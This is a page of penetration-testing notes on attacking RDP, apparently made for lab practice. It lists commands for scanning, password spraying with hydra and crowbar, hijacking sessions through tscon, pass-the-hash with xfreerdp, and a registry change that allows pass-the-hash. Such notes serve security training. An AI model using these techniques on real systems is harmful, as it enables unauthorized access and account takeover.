RDP (3389)

Footprinting using nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security check

git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl 10.129.201.248

Initiate an RDP Session (can also use Reminna or rdesktop)

xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248 /dynamic-resolution
# rdesktop -u admin -p password123 192.168.2.143

Misconfigurations

  • No password (very uncommon)

  • weak password

Password Spraying

# crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Protocol Specific Attacks

Session Hijacking

Must have SYSTEM privileges. Not working on server 2019

Note: If we have local admin privs, we can use mimikatz or psexec to gain SYSTEM privs

  1. List the users (we need the user id)

PS C:\Users\juurena> query user

  1. use tscon.exe

C:\htb> tscon {TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

Use the command below to run as local system and open new terminal

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
C:\htb> net start sessionhijack

Pass the Hash

$ xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Note: if you can't pass the hash, edit the registry. Refer to pth > using linux. or the code below

C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

PreviousR-Services (512,513,514)NextWinRM (5895,5896)

Last updated